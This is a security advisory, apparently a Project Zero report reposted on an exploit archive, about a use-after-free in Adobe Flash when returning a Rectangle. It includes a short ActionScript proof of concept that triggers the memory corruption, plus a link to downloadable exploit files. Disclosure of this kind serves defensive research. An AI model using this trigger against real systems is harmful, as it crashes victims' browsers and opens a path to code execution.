Adobe Flash - Use-After-Free When Returning Rectangle

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=842
 
Several methods in flash return instances of the Rectangle class. There is a use-after-free in creating these objects for return. If the this object of the call is a MovieClip, the Rectangle instantiation will run on its thread. If a getter is added to this class's package, it will be invoked when fetching the rectangle constructor, which can free the method's thread, which will cause the Rectangle constructor to run on a thread which has been freed. A minimal PoC is at follows:
 
var mc = this.createEmptyMovieClip( "mc", 1);
mc.scrollRect = {x : 0, y : 0, height : 10, width : 10}
var r = flash.geom.Rectangle;
var g = flash.geom;
g.addProperty("Rectangle", func, func);
var f = ASnative(900, 405); //scrollRect
mc.f = f;
mc.f();
 
function func(){
     
    mc.removeMovieClip();
     
    // fix heap
     
    return r;
     
    }
     
 
A PoC and swf are attached. The PoC crashes in Chrome on 64-bit Windows.
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40309.zip

#  0day.today [2018-04-10]  #